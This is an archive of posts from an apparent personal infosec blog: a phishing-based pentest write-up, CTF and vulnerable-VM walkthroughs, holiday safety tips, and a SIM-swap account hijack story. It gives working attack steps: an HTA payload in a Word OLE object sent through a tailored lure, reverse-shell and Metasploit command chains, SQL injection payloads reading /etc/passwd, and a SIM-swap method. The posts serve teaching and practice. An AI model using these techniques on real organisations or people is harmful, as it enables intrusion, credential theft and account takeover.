Rotimi Akinyele – The Infosec Shinobi View RSS

There is a shell in your lunch-box 28 Sep 2017 10:45 PM (8 years ago)

My team, was recently engaged by a client (Hackme) to perform a black-box external penetration test. The objective was simple – see how susceptible the organization is from an external point of view and test the effectiveness of the security controls that are managed enterprise-wide. As such, asides, the company name, we were given “ZERO” information.

The following details illustrates how we embarked upon this assessment which resulted in…
Well, read on…

OSINT 101

We kicked off with some OSINT 101 :). There are quite a number of open source intelligence tools – to assist in gathering emails, subdomains, hosts, employee names, etc from different public sources like search engines and shodan. There is an exhaustive list of such awesome tools here .

Using quite a few open source intelligence tools, we obtained publicly available documents relating to the organization. With Google dork to the rescue, we ran some basic search strings: “site:*.hackme.com ext:xls OR ext:docx OR ext:pptx” . Of course, our aim was not to tirelessly search for documents. Rather, our objective was to understand the organization’s naming schema by examining the metadata of the documents we found (most especially Microsoft Word, PowerPoint and Excel). One can also use FOCA for this.

For this assessment, using theharvester, I noticed that employees emails followed a particular naming convention – the first letter of the firstname + surname @ domain.com i.e. rakinyele@hackme.com.

Armed with this knowledge, we forked out from LinkedIn the list of all current employees of Hackme using the following google dork syntax:

site:linkedin.com -inurl:dir "at Hackme" "Current". A typical example is shown above using Google Inc as a reference company.

By hacking a script to automate the process, we copied out the firstnames, lastnames and the roles of the current employees of Hackme. A tiring approach is to manually crawl through the google pages in search for these names and role or one could also use GoogleScraper:

GoogleScraper -m http –keyword "site:linkedin.com -inurl:dir 'at Hackme' 'Current'" –num-pages-for-keyword 3 –output-filename output.json

…and then the results:

Again, I leave the possibilities to your imagination – but you can easily convert this to a .csv file using https://json-csv.com/ or any other converter that works for you.

…and then using your favorite word processor (word merge, notepad++, etc) or some good scriptfu skills, merge the firstname + lastname – to form your email list.

Now it’s time to feed our target list a payload…

Since we are simulating a black-box external attack, we decided (just like what an attacker would do) to gain code execution using malicious payloads. As such, we thought of creating a payload and sending it via emails to employees of Hackme. We also know that it is a common practice for some file type/extensions to be blocked by the organization’s email filters – to limit exposure to risk.

This then brings us to using Koadic C3 COM Command & Control, a very decent framework just like your Meterpreter or Empire.What made it really stand out asides the beautiful interface is that it allows one to dump hashes, download/upload files, execute commands, bypass UAC, scan local network for open SMB, pivot to another machine, load mimikatz and a lot more.

So we ran Koadic and set the necessary variables – using the "stager/js/mshta " module (serves payloads in memory using MSHTA.exe HTML Applications).

The result was a spawn of our HTA payload url http://192.168.127.128:443/lDxyB. However, we need our targets to execute our payload as “mshta http://192.168.127.128:443/lDxyB”. In recent years, HTA payloads have been used as a web attack vector and also, to drop malware on a victim’s PC. Now we need to get this payload past our victim’s numerous defenses.

Here comes the tricky part – we needed a way to have the victim run “mshta http://192.168.127.128:443/lDxyB” without our payload being spawned as a child process of mshta.exe – as we suspect this organization’s blue team may flag this.

Thankfully, we saw the tip below from Matt Nelson

and interestingly, the team at NCCgroup have this implemented in Demiguise. So here is our final payload saved as a .hta file.

The next step typically is to send our .hta payload as an embedded OLE object.

The intended attack scenario was:

1. Send a Microsoft word document with our .hta payload embedded as an OLE object.
2. Get the user to open the word document and the embedded OLE object.
3. This spawns a new process and we get a shell access into our victim’s PC.

Now we get to the interesting part, we need our victim to open the Microsoft word document and our payload.

 To do this, we need a very compelling story – just because users are getting smarter. So we headed back to doing more recon.

…and more recon

We need to know more about Hackme – specifically the culture and employees behaviour. The question we kept asking ourselves was “what would interest the employees?”

Where else to get this information than Glassdoor , a platform that gives you inside scoop on companies with employee reviews about salaries, benefits, pros and cons of working with the company.

After poring through reviews of Hackme on Glassdoor, we found some common themes:

1. Some employees felt mobility was a challenge as the office is quite a long distance from residential locations.

2. Employees love the organization because they get free lunch.

But Wait!

Like the old saying goes, the fastest way to a man's heart is through his stomach. So what better way to get the employees to open our payload embedded word document? Send them an email – telling them there is a change in the FREE LUNCH menu starting from tomorrow.

Rather than sending any random phishing email to employees that could be spotted easily, we decided a seemingly genuine email would be ideal complete with Hackme email signature while observing the organization email culture. Now, how do we make our email more believable? By sending an email to Customer service/Help Desk with a service request and observing the email signature in the reponse.

… recon again??????

We headed back to Linkedin, to look for the name of either the HR Manager, Logistic Manager or Admin Manager (whichever is appropriate) of Hackme. We carefully crafted an email signature with the name we selected.

We are halfway to sending our payload now. Have some patience and read on…

…time to send our payload

From the metadata recon done earlier, we could tell what our target organization’s document headers and footers looked like. I then created a new word document like the one shown below with a splitting image of Hackme document template with appropriate headers/footers.

…and then we embedded our .hta as an OLE object. Microsoft Word Document >> Insert >> Object >> Package. We changed the icon to Microsoft Word’s icon and also the caption to reflect our message.

Don’t forget the antivirus!!!

In other to check the detection rate of our payload – and to see if it will be flagged as malicious by Hackme antivirus solution (if any), we did a quick AV scan on nodistribute.com. Nodistribute.com was used because according to them, they don’t distribute payload samples to AV companies. We scanned both the maldoc and the .hta file as well.

…its’ time to make it rain send our email

If the target org does not have SPF, DKIM and DMARC configured, one can easily spoof the HR Manager, Logistic Manager or Admin Manager’s email address. In this case, I created a Gmail account (yes, gmail works too) using the Logistic Manager's first name and last name – and then spiced it up with his signature which was gotten earlier.

Let the shells in

Shortly after sending the email, within a period of about 3 minutes, we had at least 30 shell connections! W00t!!!

What next?

The rest they often say is history. From here-on, using the mimikatz modules, we escalated privileges, dumped hashes, scanned the local network of Hackme, pivoted into other PCs, browsed the target’s file systems and even became domain admins etc.

In conclusion

All in all, this was a very fun engagement. Whilst it might take an attacker a month/2months/a year of dedication to break into an organization – through a loophole at the infrastructure level. It can be fairly easy for one to gain access by exploiting the human factor.

"Once you understand your target environment, devising a creative means in gaining access to the environment becomes fairly easy”.

The moral of the exercise is: Recon, recon and more recon – for a wise man once said “Give me six hours to chop down a tree and I will spend the first four sharpening the axe".

– Rotimi Akinyele

Using the SHA1 collision attack to solve the BostonKeyParty CTF challenge 27 Feb 2017 6:06 AM (8 years ago)

This is a writeup to the Boston Key Party CTF 2017 Prudential challenge – which I took part in over the weekend. .

I viewed the source of the webpage and found out an index.txt file was being referenced.

Snippets below:

<?php
require 'flag.php';
if (isset($_GET['name']) and isset($_GET['password'])) {
    $name = (string)$_GET['name'];
    $password = (string)$_GET['password'];
    if ($name == $password) {
        print 'Your password can not be your name.';
    } else if (sha1($name) === sha1($password)) {
      die('Flag: '.$flag);
    } else {
        print '<p class="alert">Invalid password.</p>';
           }
} ?>

Two conditions need to be met here – to display the flag.

1. The $name entered must not be the same as the $password
2. The sha1($name) must be the same as sha1($password)

My thought-process at this point was to have different values for $name and $password but with the same sha1 signature. What immediately comes to mind is the SHA1 Collision attack recently revealed by the google team.

According to the google team, “It is now practically possible to craft two colliding PDF files and obtain a SHA-1 digital signature on the first PDF file which can also be abused as a valid signature on the second PDF file.”

Two different PDF files with the same checksum are available here:

http://shattered.io/static/shattered-1.pdf

http://shattered.io/static/shattered-2.pdf

I then came up with a quick and dirty python script to do the job. This script takes the value of the first pdf as parameter “name” and the second pdf as parameter “password”

import requests
import urllib2
rotimi = urllib2.urlopen("http://shattered.io/static/shattered-1.pdf").read()[:500];
letmein = urllib2.urlopen("http://shattered.io/static/shattered-2.pdf").read()[:500];
 
r = requests.get('http://54.202.82.13/', params={'name': rotimi, 'password': letmein});
print r.text

After running this, I got the flag : FLAG{AfterThursdayWeHadToReduceThePointValue}

CSAW CTF Quals 2016 Writeups 20 Sep 2016 3:18 AM (9 years ago)

This weekend was a very busy one for me – as I had to participate in 2 CTF events – MITRE and CSAW Quals with my team, NaijaSecForce. We placed 191th out of 1274 teams in the CSAW Quals. Below is the writeup for some of the challenges I solved.

Forensics – Kill

Is kill can fix? Sign the autopsy file?

kill.pcapng

Solution

We were given a .pcapng file. This was quite easy as our old friend, Grep – did the job.

Fuzyll – 200 (Recon)

All files are lowercase with no spaces. Start here: http://fuzyll.com/files/csaw2016/start

Author: fuzyll

Solution

This challenge was annoying and fun at the same time. .haha.

We visited http://fuzyll.com/files/csaw2016/start and we saw

“CSAW 2016 FUZYLL RECON PART 1 OF ?: People actually liked last year's challenge, so CSAW made me do it again... Same format as last year, new stuff you need to look up. The next part is at /csaw2016/<the form of colorblindness I have>.”

First step was to come up with our google dork site:http://fuzyll.com color blindness. We found this URL http://fuzyll.com/2015/enchroma-glasses/  and after poring through the webpage – we saw this  “The test identified me as a "Strong Deutan", which means I have Deuteranomaly (the most common kind of colorblindness)”.

We tried http://fuzyll.com/files/csaw2016/deuteranomaly and whoops - it worked.

This was a binary file of 3MB. 

We opened it and found this

So I’m here wondering – is this a sign that I have to increase my fruit intake? :D

I checked this fruit using exiftool and we found the next hint

“CSAW 2016 FUZYLL RECON PART 2 OF ?: No, strawberries don't look exactly like this, but it's reasonably close. You know what else I can't see well? /csaw2016/<the first defcon finals challenge i ever scored points on>.”

Common man!  How do I know the first defcon finals challenge you scored a point on? Anyways, google to the rescue again.

I recall Fuzyll recently released a Defcon CTF VM with challenges right from its inception here > https://github.com/fuzyll/defcon-vm . I then copied all the content off that page, pasted in my notepad++ and with some notepad-fu skills (I know python would have done a faster job), I created a wordlist of all the content on the webpage – one word per line.

I then fed this into Dirbuster to bruteforce the http://fuzyll.com/files/csaw2016/ directory. I then found this http://fuzyll.com/files/csaw2016/tomato . So yeah, tomato was the first defcon ctf finals fuzyll scored a point on.

I then checked what kind of file, tomato was

tomato: Non-ISO extended-ASCII text, with NEL line terminators

We need to convert tomato to a readable text. I used this quick bash script

for f in $(iconv -l); do echo "Converting ${f%//} …"; iconv -f ${f%//} -t UTF-8 < tomato > pepper.${f%//}.txt; done

This converts the file tomato to all known encodings. Got close to 1000 files.

So how do I sort through this to get one that contains “CSAW”, I ran this bash one liner again

$ IFS=$(echo -en "\n\b") ; for i in $(grep -Hi "CSAW" *); do echo $i | awk '{print $1}'; done

One of the files with a readable text was

pepper.CP1158.txt

I read that and I got the next hint:

root@kali:~/Desktop/CTF/CSAW# cat pepper.CP1158.txt

CSAW 2016 FUZYLL RECON PART 3 of ?: I don't even like tomatoes] Anyway, outside of CTFs, I've been playing a fair amount of World of WarCraft over the past year (never thought I'd be saying that after Cataclysm, but here we are). The next part is at /csaw2016/<my main WoW character's name>.

Okay, let me chip in here that I hardly ever play games – asides pro evolution soccer, maybe.

I then visited this Wikipedia page https://en.wikipedia.org/wiki/Characters_of_Warcraft and generated a list of WoW characters to form my wordlist.

I fed this to DirBuster again and we got fuzyll.com/files/csaw2016/jade

I checked jade and I saw the next hint

CSAW 2016 FUZYLL RECON PART 5 OF 6: I haven't spent the entire year playing video games, though. This past March, I spent time completely away from computers in Peru. This shot is from one of the more memorable stops along my hike to Machu Picchu. To make things easier on you, use only ASCII: /csaw2016/<the name of these ruins>.

A quick trip to google – I used the keywords ruins peru Machu Picchu and then I saw “winaywayna-inca-ruins".

I tried different variations and finally, someone on my team, Ahmed, helped out. http://fuzyll.com/files/csaw2016/winaywayna

CSAW 2016 FUZYLL RECON PART 6 OF 6: Congratulations! Here's your flag{WH4T_4_L0NG_4ND_STR4NG3_TRIP_IT_H45_B33N}.

Woow. That was a long tormenting journey!

Clams Don't Dance (Forensics)

Find the clam and open it to find the pearl.

out.img

Solution

First step was to check the file

root@kali:~/Desktop/CTF/CSAW# file out.img

out.img: DOS/MBR boot sector

We then used foremost to extract the files

root@kali:~/Desktop/CTF/CSAW# foremost out.img -o clam

I went through the files and found an interesting powerpoint file

I googled the presentation name and found this

https://www.uvm.edu/~wbowden/Teaching/Risk_Assessment/Projects/Project_docs2012/Presentations/Team09_Asian_Clam_risk.pptx

So I extracted the images in both files and compared

I realized the odd one was image0.gif

Found out it was a datamatrix barcode.

Used an online barcode decoder and found the flag

Mfw (Web) 125 points

Hey, I made my first website today. It's pretty cool and web7.9.

http://web.chal.csaw.io:8000/

Solution

I found this was made with Git.

Using GitTools, I was able to download the files and folders locally.

I navigated to the local Git directory

root@kali:~/Desktop/GitTools/Dumper/repo# git show

Checked the index.php page and saw this

We noticed that the assert() function was vulnerable to a code execution.

From the dump, we know that the flag.php file exists in /templates/

 After a lot of trials, we got the flag

http://web.chal.csaw.io:8000/index.php?page=flag%27)||var_dump(file_get_contents(%27templates/flag.php%27));//

View the source and you see this

<?php $FLAG="flag{3vald_@ss3rt_1s_best_a$$ert}"; ?>

Yaar Haar Fiddle Dee Dee (Forensics) – 150 points

DO WHAT YE WANT 'CAUSE A PIRATE IS FREE. YOU ARE A PIRATE!

for200.pcapng

Solution

I opened this with wireshark and found an interesting traffic. Followed the TCP stream and I got this

I saved the file and explored further using my notepad++.

This looked like a base64 encoded data. I appended this data:image/jpeg;base64 i.e. ,/9j/4AAQSkZJRgABAQAAAQABAAD/……. ; Then using http://www.freeformatter.com/base64-encoder.html , uploaded the  file and downloaded the output .

I then did a binwalk on this output

root@kali:~/Desktop/CTF/CSAW# binwalk outpt

Towards the end, I saw a flag.txt file

All data from 0 to 6540357 is part of the jpeg, but a zip file starts at 6547617. Let's extract it using dd:

dd if=./outpt of=./clamflag skip=6547617 bs=1

root@kali:~/Desktop/CTF/CSAW# file clamflag

clamflag: Zip archive data, at least v1.0 to extract

Oops! We need a password to crack the zip file. Fcrackzip to the rescue

$fcrackzip -v -D -u -p /usr/share/wordlists/rockyou.txt warmflag

We found the password and then unzipped it to read the flag

Thanks to the CSAW team for the fun challenges!

ICECTF 2016 Writeups 27 Aug 2016 11:21 PM (9 years ago)

I recently just started participating in CTF events with my team, NaijaSecForce. However, due to time constraints, it has always been a struggle coming up with writeups on how we solved some of the challenges. Luckily, ICECTF 2016 was on for 2weeks – so I was able to come up with writeups for some of the challenges I solved.

ICECTF is a Jeopardy-style CTF where you are given a question or task where you are suppose to extract a flag from it. I participated with my team NaijaSecForce and we placed 188th out of 1696 teams (yaaay. .we made top 11% :-).  So without further ado, let’s get to cracking.

Stage 1

Spotlight (Web – 10 Points)

Someone turned out the lights and now we can't find anything. Send halp! spotlight

Solution

Once you view the source of the webpage, you will see <script src="spotlight.js"></script>

View the content of this “spotlight.js” file and you will see the flag

IceCTF{5tup1d_d3v5_w1th_th31r_l095}

All your Base are belong to us (Misc · 15 p)

What a mess… we got a raw flag but now what do we do… flag.txt

Solution

This is obviously a binary and all we had to do was to convert it to ASCII. I came up with a quick python code to do that.

import binascii

r = int('01001001011000110110010101000011010101000100011001111011011000010110110000110001010111110110110101111001010111110110001001100001011100110110010101110011010111110110000101110010011001010101111101111001011011110111010101110010011100110101111101100001011011100110010001011111011000010110110001101100010111110111100100110000011101010111001001011111011000100110000101110011011001010111001101011111011000010111001001100101010111110110110101101001011011100110010101111101', 2)

binascii.unhexlify('%x' % r)

IceCTF{al1_my_bases_are_yours_and_all_y0ur_bases_are_mine}

Rotated! (Cryptography · 20 pt)

They went and ROTated the flag by 5 and then ROTated it by 8! The scoundrels! Anyway once they were done this was all that was left VprPGS{jnvg_bar_cyhf_1_vf_3?}

Solution

There seems to be a hint here as 5+8 = 13 and ROT13 is a common substitution cipher.

Using http://rumkin.com/tools/cipher/rot13.php , we got IceCTF{wait_one_plus_1_is_3?}

Move Along (Web · 30 pt)

This site seems awfully suspicious, do you think you can figure out what they're hiding?

Solution

Let’s start by viewing source i.e. view-source:http://move-along.vuln.icec.tf/ , from here we can see <img src="move_along/nothing-to-see-here.jpg"></img> . Then we change directory to http://move-along.vuln.icec.tf/move_along/ . In there, we can see another directory http://move-along.vuln.icec.tf/move_along/0f76da769d67e021518f05b552406ff6/ which leads us to our flag secret.jpg

Substituted (Cryptography · 30 pt)

We got a substitute flag, I hear they are pretty lax on the rules… crypted.txt

Solution

Using http://quipqiup.com/index.php , we got out flag IceCTF{always_listen_to_your_substitute_flags}

Time Traveler (Forensics · 45 pt)

I can assure you that the flag was on this website at some point in time.

Solution

There is a popular website – “The Wayback Machine” which  provides links to older versions of a webpage.  So we searched for http://time-traveler.icec.tf in   https://archive.org/web/ and we got our flag:

IceCTF{Th3y'11_n3v4r_f1|\|d_m4h_fl3g_1n_th3_p45t}

Stage 2

Complacent (Reconnaissance · 40 pt)

These silly bankers have gotten pretty complacent with their self-signed SSL certificate. I wonder if there's anything in there. complacent.vuln.icec.tf

Solution

Open https://complacent.vuln.icec.tf/ on chrome browser, click on the “SSL lock” >> Click on details >> certificate details and in the “Issuer” field, you will see our flag

Hidden in Plain Sight (ReverseEngineering · 45 pt done)

Make sure you take a real close look at it, it should be right there! /home/plain_sight/ or download it here

Solution

Open the file in any hex editor or use radare2 . The flag is in plain sight

Toke (Web · 45 pt)

I have a feeling they were pretty high when they made this website…

Solution

1. Register a new user
2. View the cookies parameter and you will notice a jwt_token
3. There is a Jwt token decoder available online here https://jwt.io/
4. Decode and get your flag

Flag Storage (Web · 50 pt)

What a cheat, I was promised a flag and I can't even log in. Can you get in for me? flagstorage.vuln.icec.tf. They seem to hash their passwords, but I think the problem is somehow related to this.

Solution

We were given this hint that the challenge was related to SQL Injection – so we tried some basic SQLi login bypass i.e. username : admin'/* ; password: admin'/* and we got our flag

IceCTF{why_would_you_even_do_anything_client_side}

Exposed! (Web · 60 pt)

John is pretty happy with himself, he just made his first website! He used all the hip and cool systems, like NginX, PHP and Git! Everyone is so happy for him, but can you get him to give you the flag?

Solution

I had previously solved similar challenges – so what I did was to make use of GitTools.

I then navigated to the GitTools directory and ran this

root@kali:~/Desktop/GitTools/Dumper# ./gitdumper.sh http://exposed.vuln.icec.tf/.git/ exposed

root@kali:~/Desktop/GitTools# ./extractor.sh ~/Desktop/GitTools/Dumper/exposed ~/Desktop/GitTools/exponew

Then we use our old dear friend, Grep to search for the flag

Thanks to the ICECTF team

[VIDEO] Droopy: v0.2 CTF Solution 23 May 2016 10:12 PM (9 years ago)

This video demonstrates how I solved the vulnhub Droopy v0.2 CTF challenge.

Steps

• Use Netdiscover to get the IP address of our target (Reconnaisance)
• Use Nmap to do a detailed scan of the target (Information Gathering)
• Use a publicly-available drupal exploit to creat admin account (Gaining Access)
• Upload a reverse connect script which will open an outbound TCP connection from the webserver to your host (Remote Access)
• Use a Ubuntu local privilege escalation exploit to gain root privileges (Privilege Escalation)

Commands

ifconfig
netdiscover -r 192.168.126.130
nmap -sS 192.168.126.136
Launch Firefox -> 192.168.126.136
Visit 192.168.126.136/CHANGELOG.txt
Search exploit-db.com for Drupal 7.3
Download exploit 34992
Save as Dru.py
python dru.py -t http://192.168.126.136 -u InfosecShinobi -p password1234
Login to 192.168.126.130 via the web browser
Visit Drupal's Modules page
Enable "PHP filter"
Save
Visit Drupal's configuration page
Click on "PHP Code"
Configure
Select administrator, authenticated user and anonymous user
Save configuration
Add content
Change text format to "php code"
Download php-reverse-shell.php
Edit php-reverse-shell.php
Put in your IP and a listening port i.e. 4445
Open your kali terminal
nc -lvvp 4445
Go back to browser
Copy and paste your edited php-reverse-shell code into the "add content" area of drupal
Save //Automatically, you get a shell
python -c 'import pty;pty.spawn("/bin/bash")'
cd /tmp
uname -a && cat /etc/issue
whoami
Launch browser
Search exploit-db for Ubuntu 14.04
Use exploit 37292
Save as over2.c
wget 192.168.126.130/over2.c
chmod +x over2.c
gcc over2.c
gcc over2.c -o over2
./over2
whoami && id
Gameover

Getting the Flag

**I stopped recording my screen immediately I got root – so you won't see this part in the video above.**

After gaining root, I looted the Droopy VM and then found out there there was something interesting in /var/mail/www-data

From Dave  Wed Thu 14 Apr 04:34:39 2016
Date: 14 Apr 2016 04:34:39 +0100
From: Dave 
Subject: rockyou with a nice hat!
Message-ID: <730262568@example.com>
X-IMAP: 0080081351 0000002016
Status: NN

George,

   I've updated the encrypted file... You didn't leave any
hints for me. The password isn't longer than 11 characters
and anyway, we know what academy we went to, don't you...?

I'm sure you'll figure it out it won't rockyou too much!

If you are still struggling, remember that song by The Jam

Later,
Dave

There seems to be an encrypted file somewhere looking to be found :). I eventually found a truecrypt file dave.tc in the /root directory.

I tried cracking this truecrypt file using the truecrack tool "truecrack -t dave.tc -w r0cky0u.txt -v", and it took me some hours to realise there might just be a more efficient way to do this.

I went back to my hint again, and then it struck me – "we know what academy we went to". So yeah, grep to the rescue "grep -n "academy" r0cky0u.txt > academy.txt". With this, I got a new set of wordlist with words containing "academy".

Then I ran this in my terminal "truecrack -t dave.tc -w academy.txt -v" and I got the password after some minutes – "etonacademy".

I mounted this using Veracrypt, put in the password "etonacademy" and found our flag.txt in this directory /.secret/.top

Notes

• First Song – Enya – Wild Child
• Second Song – Sir Victor Uwaifo – Joromi
• Third Song – Kiss Daniel – Are you alright
• Video Length – 10minutes

Conclusion

Thanks to the team at VulnHub for hosting this CTF challenge. The challenge was fun, and I learnt new stuffs like using truecrack to crack a Truecrypt volume.

Kindly use the comment box below for feedbacks

– InfosecShinobi

Tips to staying safe online this festive season 24 Dec 2014 4:01 AM (10 years ago)

The holiday season is upon us and as always, we all are scrambling to get the best deals online and in stores. However, a few wrong clicks this season could land cybercriminals topping your list of people who will be receiving presents this year.

This year has witnessed lots of significant breaches ranging from a $40m cyber-heist by a Nigerian bank IT worker to the huge data leakage at Sony, just about a week ago.

Information Security expert, Rotimi Akinyele of PhynxLabs said online users can easily put themselves and their devices at risk, unless they take precautions and avoid the common mistakes highlighted below that could compromise their security.

Beware of the Bank Verification Number (BVN) Scam

The ongoing Bank Verification Number (BVN) introduced by the CBN as a means of uniquely identifying bank customers across the Nigerian Banking industry has provided a fertile ground for cyber criminals to defraud unsuspecting bank customers.

Scam emails purportedly sent from Banks/CBN are in circulation urging bank customers to visit a website to activate their BVN online as failure to do so would result in their account(s) and debit cards being deactivated.

Please note that BVN registration can only be done physically at a bank’s branch. There is no technology now to replace the physical capture of your biometric data which the BVN seeks to achieve.

Do NOT access your accounts from Public WIFi

Just because a WiFi is free doesn’t mean you should connect to it any time it’s available. When you’re banking or making other online payments, it’s better to connect with EDGE or 3G, even if it’s slower. It might only be 45seconds of doing an online bank transaction, but if the wireless network has been compromised, that is more than enough time needed for a cyber-criminal to collect your data.

Use a secure password

It’s crucial to always use strong passwords as passwords are the first line of defense against cyber crooks. Try not to use names of your family, pets, first car, mother’s maiden name, etc. as all these can be easily guessed, brute forced or even available on social media sites like facebook, twitter or instagram. Make sure to use a mixture of characters, numbers, and letters of at least 8 characters when choosing your password; as only this will add a high level of difficulty for any attempted password theft.  Also, do not reuse your passwords as a compromise on one would translate to a compromise on all.

Stay safe on social networking sites

Social media sites are increasingly becoming targets for spams, scams and other online attacks. Asides mining data from tons of “status updates” for targeted attacks, cyber criminals have mastered the act of baiting unsuspecting users with well-crafted short but compelling posts offering free entry to a Christmas competition with a fantastic prize. The general rule is “there is no free lunch or freebies on the internet – if you’re not buying a product then you are the product”. Users who click the links then inadvertently act as accomplices to the cyber-criminals because the malicious scripts would automatically re-post the links, images or videos on their contacts’ walls or timelines. If an offer looks too good to be true, it probably is. Do NOT click.

Protect yourself from fraudulent emails

If you receive an email urging you to download an unknown tax payment attachment or an email informing you of an urgent pending transaction and you need to login with your details to verify, DELETE that email. Such emails usually trick users into visiting the site, and once you do, viruses and spywares get downloaded on your device which automatically joins you to a network of enslaved computers that have been programmed to carry out malicious deeds. No reputable organization would send emails to collect user names, passwords, token keys or Debit/Credit card details.

The threats to your online accounts increase daily, however, the tips above can help you stay protected online while still providing the convenience online access offers you this holiday.

Stay safe online and happy holiday!

Rotimi Akinyele is the Chief Security Evangelist at PhynxLabs where he leads the application and Network security competency.

[VIDEO] Gaining Root via the Apache Tomcat Service 9 Dec 2014 6:56 AM (10 years ago)

This video demonstrates how to exploit the Apache tomcat service on Metasploitable. Metasploitable is another vulnerable VM designed to practice penetration testing.

In this video, I will show you how to scan the system, find one of the vulnerable services "Apache Tomcat" and then exploit the service to gain root access.

Steps

• Use Netdiscover to get the IP address of our target (Reconnaisance)
• Use Nmap to do a detailed scan of the target (Information Gathering)
• Use Metasploit to brute force the Apache Tomcat Manager login (Gaining Access)
• Use Metasploit to upload and execute the payload (Remote Access)
• Use Metasploit to gain root privileges (Privilege Escalation)

Commands

ifconfig
netdiscover -r 192.168.61.0/24
nmap -T Aggressive -sV -v 192.168.61.133
msfconsole
search tomcat
use auxiliary/scanner/http/tomcat_mgr_login
set RHOSTS 192.168.61.133
set RPORT 8180
exploit
search tomcat
use exploit/multi/http/tomcat_mgr_deploy
set USERNAME tomcat
set PASSWORD tomcat
set RHOST 192.168.61.133
set RPORT 8180
set payload java/meterpreter/reverse_http
set LHOST 192.168.61.128
set target 1
exploit
use exploit/linux/local/udev_netlink
sessions -i
set SESSION 1
exploit
id
whoami

Notes

• Song – Bucie feat Heavy K – Easy to Love
• Video Length – 8minutes

Conclusion

At the end of it all, we were able to get a remote root shell from a vulnerable Apache Tomcat service. In a real world pentest scenario, we would try to explore the machine and retrieve as much sensitive information as possible. We could even use this machine to pivot into the entire Network.

Kindly use the comment box below for feedbacks

– InfosecShinobi

[VIDEO] NotSoSecure Capture The Flag Competition Walk-through 1 Nov 2013 12:39 AM (12 years ago)

The team behind NotSoSecure.com put out a public Capture The Flag competition to celebrate the launch of SQLi Labs.

The CTF was based mostly on SQL Injection vulnerabilities found in web applications. The goal was to find 2 hidden flags and submit them to ctf.NotSoSecure.com and to also stand a chance at getting one free ticket to the AppSec USA Conference plus $125 cash.

Find below a workthrough of how I did this

Steps

• I started off by trying to guess usernames/passwords using the common ones i.e. admin/admin, admin/pass, admin/1234, etc but the web application kept throwing up errors.
• So next step was to try and check the request/response being sent to/recieved by the server.
• I configured my Burp Proxy so I could interfere all requests being sent; while looking closely, I noticed there was an additional data embedded in the 302 response I got "7365637265745f72656769737465722e68746d6c".
• I immediately sent it to the hex decoder, decrypted it to plain text and lo and behold, I had "secret_register.html".
• So I fired up my browser again and visited "http://ctf.notsosecure.com/71367217217126217712/secret_register.html".
• Right before me was a "Registration Page". I then tried registering with admin but got an error that the username "admin" had been taken.
• Next step was to sign up using another username. This time, I used "hax0r123" and I was able to register and I eventually logged in as user "hax0r123".
• After checking everything else, I resorted to checking my cookies and realised I had 2 cookies : PHPSESSID and session_id.
• The session_id cookie looked suspicious especially 'cos it looked like a base64 encoded string. I then fired up my browser again and visited http://www.snarkles.net/scripts/sneak/sneak.php so I could decrypt it. Decrypted it and found out it was the email we registered with that got encoded.
• I then tried re-registering with email "testing1234@test.com" and also realised the same thing: our registered email account gets base64 encoded and reflects back to the page.
• Next step was to register with username : bb' or 'bb' = 'bb
• When sent, we'll have a query like this "SELECT * FROM Users WHERE Username=bb' or 'bb' = 'bb //We are assuming that the tablename "users" and the columnname "username" exists.
• I logged in, viewed the cookie, decrypted the base64 string "YWRtaW5Ac3FsaWxhYnMuY29t" and we had "admin@sqlilabs.com".
• Next step was to retrieve the password but first, we had to get the tablename. .
• So we used the query "rotimi' union select (select table_name FROM information_schema.columns WHERE column_name LIKE '%pass%'), '1"
• I was actually telling the web app to select the tablename that has a column_name like "pass". .I registered, checked the cookie field, decrypted the string and I found out we have a table called "users".
• Next step was to pull the password from the table "users" using the query
• "rotimi' union all select password from users–"
• But after this, I discovered we had only 1 cookie "PHPSESSID"  and the other cookie "session_id" was deleted. I immediately knew there was something wrong with the query.
• So I added a second column and my new query became
• "rotimi' union all select password,null from users–"
• I checked the cookies, decrypted the session_id value and poof, I had the password "sqlilabRocKs!!"
• So I logged in with username/password : admin/sqlilabRocKs!! aand I was logged in as the admin.
• I also went further to see if we have access to load files using the query
• "rotimi' and 1=2 union select load_file('/etc/passwd'),null–"
• w000t?!!!

Commands

rotimi' union select (select table_name FROM information_schema.columns WHERE column_name LIKE '%pass%'), '1

rotimi' union all select password from users--

rotimi' union all select password,null from users--

Username : admin@sqlilabs.com
Pssword: sqlilabRocKs!!

rotimi' and 1=2 union select load_file('/etc/passwd'),null--

Sadly, I wasn't able to get the 2nd flag but then, this exercise was awesome and at the same time challenging.

Big Ups to the NotSoSecure Team.

[VIDEO] From SQL injection to shell II – Detailed Walk-through 17 Oct 2013 7:34 AM (12 years ago)

Difficulty

Intermediate

Details

This video details the exploitation of a blind SQL injection in a PHP based website and how an attacker can use it to gain access to the administration pages. Then, using this access, the attacker will be able to gain code execution on the server by using a configuration issue.This video is a detailed walkthrough to a hacking challenge created by PentesterLab.

What you will learn?

• Blind SQL injection exploitation using time-based exploitation
• Hiding Webshell Backdoor Code in Image Files
• Gaining code execution using a PHP webshell

Requirements

• A Virtual Machine (Example: VMware Player or Virtual Box)
• From SQL injection to shell II
  • from_sqli_to_shell_II.iso (64-bit, 173M, MD5: f39875aeba47ac77ea0410e7bb1b5fa9)
  • from_sqli_to_shell_II_i386.iso (32-bit, 170M, MD5: 8434d28a36562b2a2f94b4753036df7f)
• A good understanding of SQL
• A good understanding of HTTP
• A basic understanding of PHP
• Yes, that's it!

Songs

• See-Saw-yasashii yoake TV-size
• A Stray child – Emily Bindinger
• Affectivity by projeqht

Kindly use the comment box below for feedbacks

– InfosecShinobi

How Airtel Security Flaw Led To Website Hacking 2 Aug 2013 5:34 AM (12 years ago)

In the space of one hour, the entire Nairaland.com webmaster board was overloaded with several threads titled “Naijaloaded.com got hacked”. On checking one of the threads, I hurriedly fired up my browser, checked the Naijaloaded site and poof, I had a defaced webpage before me.

Next thing I did was to send Naijaloaded’s owner a mail informing him of the hack which he then replied to this morning saying “They Swapped my SIM, Used the Forgot Password Features and Yahoo Sent the Guy my Code, he then Changed my Yahoo Password and Requested for a Password Changing Note from my Domain Registrar, Then he finally Changed my DNS”.

At first, I didn’t understand the swapping part. So I fired up my browser again and started crawling through webpages with the dork “Airtel Nigeria instant swap”.

After much crawling, I learnt that to swap your airtel sim (i.e. to hijack another person’s airtel sim), all you need is

1. An airtel swap sim which goes for just N300 and offered for sale here
2. Four (4) most dial’d no
3. The serial number on the new airtel swap sim

. .and in 20mins max, d new Sim will be ready.

That easy yeah?!

